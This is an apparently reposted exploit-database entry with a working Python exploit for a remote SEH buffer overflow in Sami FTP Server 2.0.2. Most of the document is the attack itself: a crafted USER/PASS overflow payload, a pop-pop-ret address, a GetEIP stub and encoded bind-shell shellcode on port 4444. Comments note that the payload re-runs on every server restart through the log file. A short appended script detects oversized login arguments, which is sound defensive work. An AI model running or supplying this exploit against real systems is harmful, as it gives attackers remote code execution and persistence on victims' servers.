KarjaSoft Sami FTP Server 2.0.2 – USER/PASS Remote Buffer Overflow (SEH)

  • Author: n30m1nd
    Date: 2016-11-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40675/
  • #!/usr/bin/python
    #-*- Coding: utf-8 -*-

    ### Sami FTP Server 2.0.2 - SEH Overwrite, Buffer Overflow by n30m1nd ###

    # Date: 2016-01-11
    # Exploit Author: n30m1nd
    # Vendor Homepage: http://www.karjasoft.com/
    # Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
    # Version: 2.0.2
    # Tested on: Win7 64bit and Win10 64 bit

    # Credits
    # =======
    # Thanks to PHRACK for maintaining all the articles up for so much time...
    # These are priceless and still current for exploit development!!
    # Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better

    # How to
    # ======
    # * Open Sami FTP Server and open its graphical interface
    # * Run this python script and write the IP to attack
    # * Connect to the same IP on port 4444
    #
    # BONUS
    # =====
    # Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
    # start and so, it will crash and run our shellcode every time it starts.

    # Why?
    # ====
    # The graphical interface tries to show the user name which produces an overflow overwriting SEH

    # Exploit code
    # ============

    import socket
    import struct

    def doHavoc(ipaddr):
        # Bad chars: 00 0d 0a ff
        alignment = "\x90"*3

        # nSEH: short jump over the 4-byte SEH handler address
        jmpfront = "345A7504".decode('hex')
        #CPU Disasm
        #Hex dump   Command
        #34 5A      XOR AL,5A
        #75 04      JNE SHORT +04

        # pop pop ret in tmp01.dll
        popret = 0x10022ADE

        # fstenv trick to get eip: phrack number 62
        # and store it into EAX for the metasploit shell (BufferRegister)
        getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
        #CPU Disasm
        #Hex dump   Command
        #D9EE       FLDZ
        #D934E4     FSTENV SS:[ESP]
        #8B44E40C   MOV EAX,DWORD PTR SS:[ESP+0C]
        #040B       ADD AL,0B

        # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
        shellcode = (
            getEIPinEAX +
            "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p"
            "e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq"
            "xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc"
            "VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ"
            "yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb"
            "8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9"
            "op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP"
            "qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq"
            "Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6"
            "GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm"
            "sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3"
            "ioJuAA"
        )

        # Final payload, SEH overwrite occurs at 600 bytes
        payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
        try:
            s = socket.create_connection((ipaddr, 21))
            s.send("USER "+ payload +"\r\n" )
            print s.recv(4096)

            s.send("PASS "+ payload +"\r\n" )
            print s.recv(4096)
            print s.recv(4096)
        except Exception as e:
            # original had "except e:", which raises NameError instead of catching the socket error
            print str(e)
            exit("[+] Couldn't connect")

    if __name__ == "__main__":
        ipaddr = raw_input("[+] IP: ")
        doHavoc(ipaddr)
        while raw_input("[?] Got shell?(y/n) ").lower() == "n":
            doHavoc(ipaddr)
        print "[+] Enjoy..."
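A defender-side check for the condition this exploit relies on (a USER or PASS argument long enough to reach the SEH record, which the post puts at 600 bytes), added here as an example and not part of the original post. It assumes FTP control-channel command lines are available as strings, for instance from a proxy or protocol log; the sample lines and the 256-byte threshold are constructed for the example.

```python
# Constructed sample FTP control-channel lines (not from the original post).
# Line 3 mirrors the exploit layout: 3 NOPs, filler up to the 600-byte SEH
# offset, then trailing bytes; line 4 is a plain oversized PASS.
SAMPLE_LINES = [
    "USER anonymous",
    "PASS guest@example.org",
    "USER " + "\x90" * 3 + "." * 597 + "A" * 40,
    "PASS " + "A" * 700,
    "CWD /pub",
]

# Sami FTP's SEH record is reached at 600 bytes; a threshold well below
# that is still far longer than any legitimate login credential.
MAX_ARG_LEN = 256

def parse_command(line):
    """Split one FTP control line into (VERB, argument)."""
    parts = line.rstrip("\r\n").split(" ", 1)
    verb = parts[0].upper()
    arg = parts[1] if len(parts) > 1 else ""
    return verb, arg

def is_suspicious(verb, arg, max_len=MAX_ARG_LEN):
    """Return (flagged, reasons) for a USER/PASS argument; other verbs are ignored."""
    if verb not in ("USER", "PASS"):
        return False, None
    reasons = []
    if len(arg) > max_len:
        reasons.append("length %d exceeds %d" % (len(arg), max_len))
    # NOP sleds, address bytes and encoded shellcode fall outside printable ASCII
    if any(ord(c) < 0x20 or ord(c) > 0x7e for c in arg):
        reasons.append("non-printable bytes in argument")
    return bool(reasons), reasons

def scan(lines, max_len=MAX_ARG_LEN):
    """Report (line_no, verb, arg_len, reasons). The argument itself is never
    included, so a logged PASS value is not copied into the alert."""
    findings = []
    for n, line in enumerate(lines, 1):
        verb, arg = parse_command(line)
        flagged, reasons = is_suspicious(verb, arg, max_len)
        if flagged:
            findings.append((n, verb, len(arg), reasons))
    return findings

if __name__ == "__main__":
    for n, verb, length, reasons in scan(SAMPLE_LINES):
        print("line %d: %s argument of %d bytes: %s" % (n, verb, length, "; ".join(reasons)))
```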